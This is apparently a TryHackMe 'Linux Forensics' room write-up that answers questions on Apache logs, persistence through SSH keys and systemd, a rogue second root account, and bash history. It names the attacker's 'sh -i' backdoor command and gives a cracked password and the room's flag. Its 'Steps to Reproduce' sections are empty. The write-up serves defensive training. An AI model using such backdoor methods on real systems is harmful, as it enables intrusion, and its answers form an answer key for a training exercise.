Linux Forensics
Date: 04, June, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
Apache Log Analysis 1
The most significant attack surface on the server is probably the web service.
Fortunately, the Apache access log keeps a history of all of the requests sent to the webserver and includes:
Source IP address
Response code & Length
User-Agent
User-Agent - We can also use this string to identify traffic from potentially malicious tools as scanning tools like Nmap, SQLmap, DirBuster and Nikto leak their identity's through default user-agent strings.
How many different tools made requests to the server?
Answer: 2
curl and nmap
Name a path requested by Nmap.
Answer: /nmaplowercheck1618912425
Steps to Reproduce:
Web Server Analysis
Web scanners are run against servers pretty much all the time, so this traffic is not out of the ordinary.
Have a look around the site for potential attack vectors.
What page allows users to upload files?
Answer: contact.php
Steps to Reproduce:
What IP uploaded files to the server?
Answer: 192.168.56.24
Steps to Reproduce:
Who left an exposed security notice on the server?
Answer: Fred
Steps to Reproduce:
Filter out the noise from the log files:
Check the SECURITY.md file:
Persistence Mechanism 1
There are multiple ways to maintain persistence in most Linux distributions including but not limited to:
cron
Services/systemd
bashrc
Kernel modules
SSH keys
What command and option did the attacker use to establish a backdoor?
Answer: sh -i
Steps to Reproduce:
User Accounts
/etc/passwd
- contains the names of most of the accounts on the system. Should have open read permissions and should not contain password hashes./etc/shadow
- contains names but should also contain password hashes. Should have strict permissions.
What is the password of the second root account?
Answer: mrcake
Steps to Reproduce:
Check out both the files:
If there is a
x
after the first colon, then it means that the password hash is stored in the/etc/shadow
file.But for the root2 account, the password hash is in the place of x.
Cracking the hash:
Apache Log Analysis 2
There are a few other ways of identifying traffic originating from scanners.
The
time between each request
is a good metric for most tools.Identify individual tools from
signatures left in the requests
; for example, Nmap will send HTTP requests with a random non-standard method when performing certain enumeration tasks.More aggressive tools can also be identified simply from the
number of requests
sent during any given attack; directory brute-forcing tools are a perfect example of this and are likely to fall foul of banning systems like fail2ban.
Fail2ban is a daemon that can be run on your server to dynamically block clients that fail to authenticate correctly with your services repeatedly.
Fail2Ban is an intrusion prevention software framework that protects computer servers from brute-force attacks.
It is written in the Python programming language.
A poorly designed site may also freely grant valuable information without the need for aggressive tools. - In this case, the site uses sequential IDs for all of the products making.
It easily scrapes every single product or finds the total size of the product database by simply increasing the product ID until a 404 error occurs.
Name one of the non-standard HTTP Requests.
Answer:
Steps to Reproduce:
At what time was the Nmap scan performed? (format: HH:MM:SS)
Answer: 13:30:15
Persistence Mechanism 2
SSH-keys are another excellent way of maintaining access, so it might be worth looking for additions to the
authorized_keys
file.
What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname)
Answer: kali@kali
Steps to Reproduce:
Program Execution History
Of course, adding a public key to root's authorized_keys requires root-level privileges so, it may be best to look for more evidence of privilege escalation.
In general, Linux stores a tiny amount of programme execution history when compared to Windows but, there are still a few valuable sources, including:
bash_history
- Contains a history of commands run in bash; this file is well known, easy to edit and sometimes disabled by default.auth.log
- Contains a history of all commands run using sudo.history.log (apt)
- Contains a history of all tasks performed using apt - is useful for tracking programme
systemd services
- keep logs in thejournald system
These logs are kept in a binary format and have to be read by a utility like
journalctl
. This binary format comes with some advantages; however, each journal is capable of validating itself and is harder to modify.To view:
journalctl /lib/systemd/systemd-journald
What is the first command present in root's bash_history file?
Answer: nano /etc/passwd
Steps to Reproduce:
Peristence Mechanism 3
Malware can also maintain persistence using systemd as scripts run under systemd can run in the background and restart whenever the system is booted or whenever the script crashes.
It is also relatively easy to conceal malicious scripts as they can blend in with other services
systemd services
are defined in.service
files which can contain:The command that runs whenever the service starts
The user the service runs as
An optional description
Running
systemctl
will list all of the services loaded into the system.It might be worth adding
--type=service --state=active
to the command as it will reduce the list to services that are running.Once the name of a suspicious service is found, more information can then be extracted by running
systemctl status <service name>
Figure out what's going on and find the flag.
Answer: gh0st_1n_the_machine
Steps to Reproduce:
Last updated